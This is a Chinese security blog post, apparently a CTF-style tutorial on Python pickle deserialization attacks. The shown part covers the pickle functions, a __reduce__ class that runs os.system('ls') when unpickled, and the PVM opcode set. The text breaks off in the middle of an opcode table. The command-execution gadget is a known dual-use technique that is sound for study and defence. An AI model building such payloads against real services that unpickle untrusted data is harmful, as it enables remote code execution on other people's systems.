<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ayan0.top","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":280,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Pickle反序列化的利用  pickle是什么，能吃吗 pickle虽说是和python有点关系，但是不如说它更像一门单独的语言">
<meta property="og:type" content="article">
<meta property="og:title" content="随手打的pickle反序列化">
<meta property="og:url" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
<meta property="og:site_name" content="Blog of AyaN0">
<meta property="og:description" content="Pickle反序列化的利用  pickle是什么，能吃吗 pickle虽说是和python有点关系，但是不如说它更像一门单独的语言">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513135736987.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513140625824.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513145648001.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513150109996.png">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-b42656fa4b3c95eaee8c37dccacad636_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-8b0cb8c071dadcde37abdce434a8f180_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-2a5604887f01ef88aebf6409279e82a1_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-d02aeb43085db59a6d4b41f88c5ea68e_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-be0b611551c62614ea92f06ffe234480_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-5d923ca1b18273daec2e8131b64b8721_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-ae7ce8d82f16d90bda791e4bc5e06f1d_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-5f6f6661a916b296e3fac6fbed8427cc_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-44a237be1ffe80cf2969d217831fe5dd_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-fd188e8d3e3f341d719019b7e869bf9d_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-d5b6e15f6b0506689952cf0e8f93691f_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-f60a5ad59d548b1ca78b839320318dfe_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-377763e71f5d198566d7b40e418289f8_1440w.jpg">
<meta property="og:image" content="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/kisakiayano/source/_posts/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/v2-0c450bc39b3ce69cdf14486ed14752c1_1440w.jpg">
<meta property="article:published_time" content="2025-05-13T05:36:32.000Z">
<meta property="article:modified_time" content="2025-07-15T08:37:54.778Z">
<meta property="article:author" content="AyaN0">
<meta property="article:tag" content="-Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513135736987.png">


<link rel="canonical" href="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/","path":"2025/05/13/随手打的pickle反序列化/","title":"随手打的pickle反序列化"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>随手打的pickle反序列化 | Blog of AyaN0</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/lly.jpg" alt="Blog of AyaN0">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Blog of AyaN0</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-number">1.</span> <span class="nav-text"> Pickle反序列化的利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#pickle%E6%98%AF%E4%BB%80%E4%B9%88%E8%83%BD%E5%90%83%E5%90%97"><span class="nav-number">1.1.</span> <span class="nav-text"> pickle是什么，能吃吗</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pvm"><span class="nav-number">1.2.</span> <span class="nav-text"> PVM</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#pickletools"><span class="nav-number">1.2.1.</span> <span class="nav-text"> pickletools</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.3.</span> <span class="nav-text"> 反序列化漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%87%E6%81%B6%E4%B9%8B%E6%BA%90__reduce__%E6%96%B9%E6%B3%95"><span class="nav-number">1.3.1.</span> <span class="nav-text"> 万恶之源–__reduce__方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#waf"><span class="nav-number">1.3.2.</span> <span class="nav-text"> WAF</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%87%BD%E6%95%B0%E9%BB%91%E5%90%8D%E5%8D%95"><span class="nav-number">1.3.2.1.</span> <span class="nav-text"> 绕过函数黑名单</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%8C%85%E5%90%ABc%E6%8C%87%E4%BB%A4%E7%A0%81%E7%9A%84%E5%A6%99%E7%94%A8"><span class="nav-number">1.3.2.2.</span> <span class="nav-text"> 全局变量包含：c指令码的妙用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87c%E6%8C%87%E4%BB%A4module%E9%99%90%E5%88%B6%E5%85%88%E8%AF%BB%E5%85%A5%E5%86%8D%E7%AF%A1%E6%94%B9"><span class="nav-number">1.3.2.3.</span> <span class="nav-text"> 绕过c指令module限制：先读入，再篡改</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%8D%E7%94%A8reduce%E4%B9%9F%E8%83%BDrce"><span class="nav-number">1.3.2.4.</span> <span class="nav-text"> 不用reduce，也能RCE</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E4%BA%9B%E7%BB%86%E8%8A%82"><span class="nav-number">1.3.2.5.</span> <span class="nav-text"> 一些细节</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%89%8B%E6%90%93opcode"><span class="nav-number">1.3.3.</span> <span class="nav-text"> 手搓opcode</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="AyaN0"
      src="/images/lly.jpg">
  <p class="site-author-name" itemprop="name">AyaN0</p>
  <div class="site-description" itemprop="description">不断的前进的人:只有0次摔倒或无数次的爬起</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/kisakiayano" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;kisakiayano" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1594453512@qq.com" title="E-Mail → 1594453512@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ayan0.top/2025/05/13/%E9%9A%8F%E6%89%8B%E6%89%93%E7%9A%84pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/lly.jpg">
      <meta itemprop="name" content="AyaN0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog of AyaN0">
      <meta itemprop="description" content="不断的前进的人:只有0次摔倒或无数次的爬起">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="随手打的pickle反序列化 | Blog of AyaN0">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          随手打的pickle反序列化
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-05-13 13:36:32" itemprop="dateCreated datePublished" datetime="2025-05-13T13:36:32+08:00">2025-05-13</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-07-15 16:37:54" itemprop="dateModified" datetime="2025-07-15T16:37:54+08:00">2025-07-15</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>11k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>21 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="pickle反序列化的利用"><a class="markdownIt-Anchor" href="#pickle反序列化的利用"></a> Pickle反序列化的利用</h1>
<h2 id="pickle是什么能吃吗"><a class="markdownIt-Anchor" href="#pickle是什么能吃吗"></a> pickle是什么，能吃吗</h2>
<p>pickle虽说是和python有点关系，但是不如说它更像一门单独的语言</p>
<p>既然要讲反序列化，那就先讲讲用于反序列化的函数</p>
<pre><code class="highlight plaintext">pickle.dump()//序列化
pickle.load()//反序列化
pickle.dumps()
pickle.loads()</code></pre>
<p>先写个实例来大致了解一下这个东东</p>
<pre><code class="highlight python"><span class="keyword">import</span> pickle
<span class="keyword">class</span> <span class="title class_">myday</span>():
	task=<span class="string">&#x27;ctf&#x27;</span>
	sloves=<span class="number">114514</span>
x=myday()
<span class="built_in">print</span>(pickle.dumps(x))</code></pre>
<p>可以看到打印出了这样一串<img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513135736987.png" alt="image-20250513135736987"></p>
<p>但是仔细一看，不太对，我的114514怎么被吞了</p>
<p>发现需要写一个函数来处理，重新写一下</p>
<pre><code class="highlight python"><span class="keyword">import</span> pickle
<span class="keyword">class</span> <span class="title class_">myday</span>():
	<span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):
		<span class="variable language_">self</span>.task=<span class="string">&#x27;ctf&#x27;</span>
		<span class="variable language_">self</span>.sloves=<span class="number">114514</span>
x=myday()
<span class="built_in">print</span>(pickle.dumps(x))</code></pre>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250513140625824.png" alt="image-20250513140625824"></p>
<p>真不赖吧。。</p>
<p>当然你也可以这样写</p>
<pre><code class="highlight python"><span class="keyword">import</span> os, pickle
<span class="keyword">class</span> <span class="title class_">Test</span>(<span class="title class_ inherited__">object</span>):
    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):
        <span class="keyword">return</span> (os.system,(<span class="string">&#x27;ls&#x27;</span>,))
    
<span class="built_in">print</span>(pickle.dumps(Test(), protocol=<span class="number">0</span>))<span class="comment">#这边protocol是控制协议版本的，我们最常用的即是0的版本</span></code></pre>
<h2 id="pvm"><a class="markdownIt-Anchor" href="#pvm"></a> PVM</h2>
<p><s>是Plant VS Mamba吗</s></p>
<p>pickle是一种栈语言，基于一个轻量级的PVM</p>
<p>PVM由三个部分组成:</p>
<pre><code class="highlight plaintext">指令处理器
从流中读取 opcode 和参数，并对其进行解释处理。重复这个动作，直到遇到 . 这个结束符后停止。
最终留在栈顶的值将被作为反序列化对象返回。

stack
由 Python 的 list 实现，被用来临时存储数据、参数以及对象。

memo
由 Python 的 dict 实现，为 PVM 的整个生命周期提供存储</code></pre>
<p>飞个指令集<s>不用全看，反正很多用不到也看不懂</s>，可以仔细看看</p>
<pre><code class="highlight plaintext">MARK           = b&#x27;(&#x27;   # push special markobject on stack
STOP           = b&#x27;.&#x27;   # every pickle ends with STOP
POP            = b&#x27;0&#x27;   # discard topmost stack item
POP_MARK       = b&#x27;1&#x27;   # discard stack top through topmost markobject
DUP            = b&#x27;2&#x27;   # duplicate top stack item
FLOAT          = b&#x27;F&#x27;   # push float object; decimal string argument
INT            = b&#x27;I&#x27;   # push integer or bool; decimal string argument
BININT         = b&#x27;J&#x27;   # push four-byte signed int
BININT1        = b&#x27;K&#x27;   # push 1-byte unsigned int
LONG           = b&#x27;L&#x27;   # push long; decimal string argument
BININT2        = b&#x27;M&#x27;   # push 2-byte unsigned int
NONE           = b&#x27;N&#x27;   # push None
PERSID         = b&#x27;P&#x27;   # push persistent object; id is taken from string arg
BINPERSID      = b&#x27;Q&#x27;   #  &quot;       &quot;         &quot;  ;  &quot;  &quot;   &quot;     &quot;  stack
REDUCE         = b&#x27;R&#x27;   # apply callable to argtuple, both on stack
STRING         = b&#x27;S&#x27;   # push string; NL-terminated string argument
BINSTRING      = b&#x27;T&#x27;   # push string; counted binary string argument
SHORT_BINSTRING= b&#x27;U&#x27;   #  &quot;     &quot;   ;    &quot;      &quot;       &quot;      &quot; &lt; 256 bytes
UNICODE        = b&#x27;V&#x27;   # push Unicode string; raw-unicode-escaped&#x27;d argument
BINUNICODE     = b&#x27;X&#x27;   #   &quot;     &quot;       &quot;  ; counted UTF-8 string argument
APPEND         = b&#x27;a&#x27;   # append stack top to list below it
BUILD          = b&#x27;b&#x27;   # call __setstate__ or __dict__.update()
GLOBAL         = b&#x27;c&#x27;   # push self.find_class(modname, name); 2 string args
DICT           = b&#x27;d&#x27;   # build a dict from stack items
EMPTY_DICT     = b&#x27;&#125;&#x27;   # push empty dict
APPENDS        = b&#x27;e&#x27;   # extend list on stack by topmost stack slice
GET            = b&#x27;g&#x27;   # push item from memo on stack; index is string arg
BINGET         = b&#x27;h&#x27;   #   &quot;    &quot;    &quot;    &quot;   &quot;   &quot;  ;   &quot;    &quot; 1-byte arg
INST           = b&#x27;i&#x27;   # build &amp; push class instance
LONG_BINGET    = b&#x27;j&#x27;   # push item from memo on stack; index is 4-byte arg
LIST           = b&#x27;l&#x27;   # build list from topmost stack items
EMPTY_LIST     = b&#x27;]&#x27;   # push empty list
OBJ            = b&#x27;o&#x27;   # build &amp; push class instance
PUT            = b&#x27;p&#x27;   # store stack top in memo; index is string arg
BINPUT         = b&#x27;q&#x27;   #   &quot;     &quot;    &quot;   &quot;   &quot; ;   &quot;    &quot; 1-byte arg
LONG_BINPUT    = b&#x27;r&#x27;   #   &quot;     &quot;    &quot;   &quot;   &quot; ;   &quot;    &quot; 4-byte arg
SETITEM        = b&#x27;s&#x27;   # add key+value pair to dict
TUPLE          = b&#x27;t&#x27;   # build tuple from topmost stack items
EMPTY_TUPLE    = b&#x27;)&#x27;   # push empty tuple
SETITEMS       = b&#x27;u&#x27;   # modify dict by adding topmost key+value pairs
BINFLOAT       = b&#x27;G&#x27;   # push float; arg is 8-byte float encoding

TRUE           = b&#x27;I01\n&#x27;  # not an opcode; see INT docs in pickletools.py
FALSE          = b&#x27;I00\n&#x27;  # not an opcode; see INT docs in pickletools.py</code></pre>
<p>常用的其实就下面几种，仔细介绍一下</p>
<table>
<thead>
<tr>
<th>指令</th>
<th>描述</th>
<th>具体写法</th>
<th>栈上的变化</th>
</tr>
</thead>
<tbody>
<tr>
<td>c</td>
<td>获取一个全局对象或import一个模块</td>
<td>c[module]\n[instance]\n</td>
<td>获得的对象入栈</td>
</tr>
<tr>
<td>o</td>
<td>寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数（或实例化一个对象）</td>
<td>o</td>
<td>这个过程中涉及到的数据都出栈，函数的返回值（或生成的对象）入栈</td>
</tr>
<tr>
<td>i</td>
<td>相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）</td>
<td>i[module]\n[callable]\n</td>
<td>这个过程中涉及到的数据都出栈，函数返回值（或生成的对象）入栈</td>
</tr>
<tr>
<td>N</td>
<td>实例化一个None</td>
<td>N</td>
<td>获得的对象入栈</td>
</tr>
<tr>
<td>S</td>
<td>实例化一个字符串对象</td>
<td>S’xxx’\n（也可以使用双引号、'等python字符串形式）</td>
<td>获得的对象入栈</td>
</tr>
<tr>
<td>V</td>
<td>实例化一个UNICODE字符串对象</td>
<td>Vxxx\n</td>
<td>获得的对象入栈</td>
</tr>
<tr>
<td>I</td>
<td>实例化一个int对象</td>
<td>Ixxx\n</td>
<td>获得的对象入栈</td>
</tr>
<tr>
<td>F</td>
<td>实例化一个float对象</td>
<td>Fx.x\n</td>
<td>获得的对象入栈</td>
</tr>
<tr>
<td>R</td>
<td>选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数</td>
<td>R</td>
<td>函数和参数出栈，函数的返回值入栈</td>
</tr>
<tr>
<td>.</td>
<td>程序结束，栈顶的一个元素作为pickle.loads()的返回值</td>
<td>.</td>
<td>无</td>
</tr>
<tr>
<td>(</td>
<td>向栈中压入一个MARK标记</td>
<td>(</td>
<td>MARK标记入栈</td>
</tr>
<tr>
<td>t</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为元组</td>
<td>t</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td>)</td>
<td>向栈中直接压入一个空元组</td>
<td>)</td>
<td>空元组入栈</td>
</tr>
<tr>
<td>l</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为列表</td>
<td>l</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td>]</td>
<td>向栈中直接压入一个空列表</td>
<td>]</td>
<td>空列表入栈</td>
</tr>
<tr>
<td>d</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为字典（数据必须有偶数个，即呈key-value对）</td>
<td>d</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td>}</td>
<td>向栈中直接压入一个空字典</td>
<td>}</td>
<td>空字典入栈</td>
</tr>
<tr>
<td>p</td>
<td>将栈顶对象储存至memo_n</td>
<td>pn\n</td>
<td>无</td>
</tr>
<tr>
<td>g</td>
<td>将memo_n的对象压栈</td>
<td>gn\n</td>
<td>对象被压栈</td>
</tr>
<tr>
<td>0</td>
<td>丢弃栈顶对象</td>
<td>0</td>
<td>栈顶对象被丢弃</td>
</tr>
<tr>
<td>b</td>
